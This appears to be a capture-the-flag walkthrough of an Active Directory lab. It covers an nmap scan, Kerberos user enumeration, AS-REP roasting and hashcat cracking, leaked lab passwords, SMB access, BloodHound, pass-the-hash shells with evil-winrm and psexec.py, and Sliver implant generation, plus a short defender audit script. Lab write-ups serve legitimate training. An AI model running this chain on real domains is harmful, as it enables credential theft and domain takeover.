
Impacket scripts and their uses: Impacket

Impacket is a collection of Python classes for working with network protocols.


Formerly hosted by SecureAuth, Impacket is now maintained by Fortra.
```shell
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-18 19:21:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-09-17T19:16:45
|_Not valid after:  2024-03-18T19:16:45
|_ssl-date: 2023-09-18T19:21:59+00:00; +31s from scanner time.
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2023-09-18T19:21:51+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
| smb2-time:
|   date: 2023-09-18T19:21:54
|_  start_date: N/A
```

spookysec.local -> /etc/hosts
ATTACKTIVEDIREC.spookysec.local

```shell
S-1-5-21-3591857110-2884097990-301047963
```
Kerberos protocol explained:
https://beta.hackndo.com/kerberos/
https://github.com/ropnop/kerbrute
https://raw.githubusercontent.com/Orange-Cyberdefense/ocd-mindmaps/12341b224aaa2da121cde02651f94c52945156cb/img/pentest_ad_dark_2023_02.svg

```shell
kerbrute userenum -d "spookysec.local" userlist.txt --dc ATTACKTIVEDIREC.spookysec.local
```

```shell
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile userlist.txt -dc-ip "ATTACKTIVEDIREC.spookysec.local" "spookysec.local"/
```

james

```shell
.\hashcat.exe -m 18200 .\hash.txt .\rockyou.txt
```

management2005

```shell
svc-admin:management2005
```
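As an added defender-side example (not part of the original notes): GetNPUsers.py can only obtain an AS-REP for accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set and that are not disabled. The Python below audits a constructed CSV export of accounts for that flag so it can be cleared; the account names and flag values are assumed sample data.

```python
import csv
import io

# userAccountControl bits relevant here (values from the AD schema).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}


def decode_uac(value: int) -> set:
    """Names of the known flag bits set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def parse_export(text: str) -> dict:
    """Parse a CSV export (sAMAccountName,userAccountControl) into a dict."""
    reader = csv.DictReader(io.StringIO(text))
    return {row["sAMAccountName"]: int(row["userAccountControl"]) for row in reader}


def asrep_roastable(accounts: dict) -> list:
    """Enabled accounts with DONT_REQ_PREAUTH set, i.e. what GetNPUsers.py targets.

    Disabled accounts are skipped: the KDC refuses them, so they yield no AS-REP.
    """
    found = []
    for sam, uac in sorted(accounts.items()):
        flags = decode_uac(uac)
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            found.append(sam)
    return found


# Constructed sample export (hypothetical values, not taken from the lab).
SAMPLE_EXPORT = """sAMAccountName,userAccountControl
svc-admin,4194816
backup,66048
james,512
old-svc,4194818
"""

if __name__ == "__main__":
    for sam in asrep_roastable(parse_export(SAMPLE_EXPORT)):
        print(f"{sam}: clear 'Do not require Kerberos preauthentication' (bit 0x400000)")
```

Running it on the sample reports only svc-admin; old-svc carries the flag too but is disabled, so it is not reported.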

SMB (Server Message Block) share enumeration:

```shell
crackmapexec smb 10.10.196.242 -u svc-admin -p 'management2005' --shares
```

```shell
smbclient.py "spookysec.local"/"svc-admin":"management2005"@"ATTACKTIVEDIREC.spookysec.local"
```

-> Retrieve a txt file

Decode it with CyberChef

backup@spookysec.local:backup2517860

Bloodhound
BloodHound CE user guide:

https://bloodhound.readthedocs.io/en/latest/data-analysis/bloodhound-gui.html
https://bloodhound.readthedocs.io/en/latest/data-analysis/nodes.html
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html

```shell
### Starting the neo4j database
$ neo4j start
# or
$ neo4j console

### Bloodhound
# Collecting the data
$ bloodhound-python -c All -u svc-admin -p management2005 -d spookysec.local -ns 10.10.196.242
# or
$ SharpHound.exe (PowerShell version)

## Import the data into BloodHound
```


Getting remote access

```shell
$ evil-winrm -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -i 10.10.196.242  # access as the Administrator user
psexec.py -hashes :"0e0363213e37b94221497260b0bcb4fc" "SPOOKYSEC.LOCAL"/"Administrator"@"10.10.196.242"  # access as NT AUTHORITY\SYSTEM
```

Useful commands to run (outside the scope of the THM room)

```shell
crackmapexec smb 10.10.196.242 -u svc-admin -p 'management2005' --shares -M gpp_password
```

Sliver commands

```shell
## Start the service
sliver-server
## Listen over mTLS
[server] sliver > mtls
## Generate an implant
[server] sliver > generate --mtls LHOST --save /path/2/save/implant --os Windows
```
